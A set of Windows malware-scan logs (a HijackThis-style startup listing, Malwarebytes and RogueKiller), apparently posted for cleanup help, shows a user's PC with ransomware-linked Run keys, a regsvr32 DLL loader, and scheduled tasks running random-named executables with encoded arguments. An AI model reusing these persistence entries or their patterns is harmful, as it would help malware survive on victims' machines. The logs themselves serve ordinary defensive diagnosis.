R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Unknown owner - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 11925 bytes
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:23
Logovací soubor: mwanm.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1510
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433429
Uplynulý čas: 10 min, 35 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 9
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\fnhfdmnphmbbjbgppnpcddkefmeokfho, Žádná uživatelská akce, [3239], [360481],1.0.1510
Soubor: 30
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.eot, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.ttf, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.woff, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\fonts.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\jquery-ui.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\site.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\weather.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\128x128.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\16x16.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\19x19.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\38x38.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\favicon.ico, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\pop.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_refresh_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_search_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\logo.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\m1-min.jpg, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\bootstrap.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery-ui.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.simpleWeather.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\list.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\weather.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\background.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\site.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\computed_hashes.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\verified_contents.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\main.html, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\manifest.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.MyRadioXP, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_fnhfdmnphmbbjbgppnpcddkefmeokfho_0.localstorage, Žádná uživatelská akce, [3243], [360496],1.0.1510
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Smazat -- Datum : 03/15/2017 20:26:18 (Duration : 00:24:48)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Smazáno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Smazáno
[Suspicious.Path] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Smazáno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> ERROR [2]
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Smazáno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
